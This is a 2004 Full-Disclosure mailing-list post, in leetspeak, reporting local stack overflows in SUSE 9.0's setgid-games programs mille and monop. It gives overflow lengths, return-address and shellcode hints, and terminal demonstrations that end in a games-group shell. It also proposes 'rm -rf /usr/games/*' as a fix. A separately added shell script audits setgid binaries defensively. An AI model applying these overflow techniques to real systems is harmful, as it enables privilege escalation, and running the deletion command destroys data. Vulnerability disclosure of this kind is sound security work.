[Full-Disclosure] Suse 9.0 Multiple gid = 20(games) vulnz

From: narko tix (narkotix_at_linuxmail.org)
Date: 04/17/04

    To: full-disclosure@lists.netsys.com
    Date: Sat, 17 Apr 2004 23:06:55 +0800

                           ----- S3CTI0N 0x01 -----
                             
    -Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
           Pr0gr4m suid3d t0 games wi7h d3f4ul7.

    -3xpl0i747i0n : 0x01-) m4nu4l-) 112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 3xpl0i747i0n.
                                     us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.

                    0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', '\x90','\220' ch4r4ct3rs.
                        XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 3sp3ci4lly 0x90 4nd \220.
                        Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
    -D3m0ns7r4ti0n:

    addicted@labs:~/c-hell$ ./env
    RET = þÿ¿

    addicted@labs:~/c-hell$ /usr/games/mille
    --HAND-- --DECK-- | ---- ---- -----
    P 89 | Hand Total 0 0
    1 75 --DISCARD-- | ----- -----
    2 Go | Overall Total 0 0
    3 Gasoline | Games 0 0
    4 Repairs file: þÿ¿ þÿ¿ þÿ¿ þ|
    ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| p: pick q: quit
    ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| u: use # o: order hand
    ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| d: discard # s: save
    ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| w: toggle window r: reprint
    ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ|
    ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ sh-2.05b$ uid=1001(addicted) gid=20(games) groups=100(users)

                           ----- S3CTI0N 0x02 -----

    -Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz s7ill vuln3r4bl3.
           0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
           Pr0gr4m suid3d games by d3f4ul7
    -3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
                           Us3 y0ur ASCII r3t 4ddr3ss.
                        
                    0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like '\x0b'. XOR them.
                           3xpl0i7 4tt4ch3d.
    -D3m0nstr4ti0n:
    addicted@labs:~/c-hell$ ./env
    RET = þÿ¿
    addicted@labs:~/c-hell$ /usr/games/monop
    How many players? 1
    Player 1's name: þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
    sh-2.05b$ id
    uid=1001(addicted) gid=20(games) groups=100(users)
    sh-2.05b$

                        ----- S3C7I0N 0x03 -----
    C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm t00 B0R3D.
    Quick P4tch : rm -rf /usr/games/*
    --------------------------------------------------------------------------------------------------------------------------------------

    N4rK07IX
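Added example, not code from the post or from SUSE: a POSIX shell audit that lists the setgid binaries owned by the games group under /usr/games (the condition that turns an overflow in mille or monop into a gid=20(games) shell) and prints the narrower fix of clearing the setgid bit instead of the rm -rf quick patch. The function names and the directory/group defaults are assumptions.

```shell
#!/bin/sh
# Audit helper (added example): find setgid executables owned by a given
# group under a directory. Defaults assume the post's layout: /usr/games, games.

list_setgid_for_group() {
    dir=${1:-/usr/games}
    grp=${2:-games}
    # -perm -2000: setgid bit set; -group: file owned by that group.
    find "$dir" -type f -perm -2000 -group "$grp" 2>/dev/null | sort
}

# Number of such binaries; a hardening check would alert when this is non-zero.
count_setgid_for_group() {
    list_setgid_for_group "$1" "$2" | wc -l | tr -d ' '
}

# Emit (but do not run) the least destructive remediation: drop the setgid
# bit so a crash in the game stays confined to the invoking user's own gid.
suggest_dropping_setgid() {
    list_setgid_for_group "$1" "$2" | while IFS= read -r f; do
        printf 'chmod g-s %s\n' "$f"
    done
}

# Stand-alone use: report on the real /usr/games (prints 0 if it is absent).
n=$(count_setgid_for_group /usr/games games)
printf '%s setgid-games binaries under /usr/games\n' "$n"
suggest_dropping_setgid /usr/games games
```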

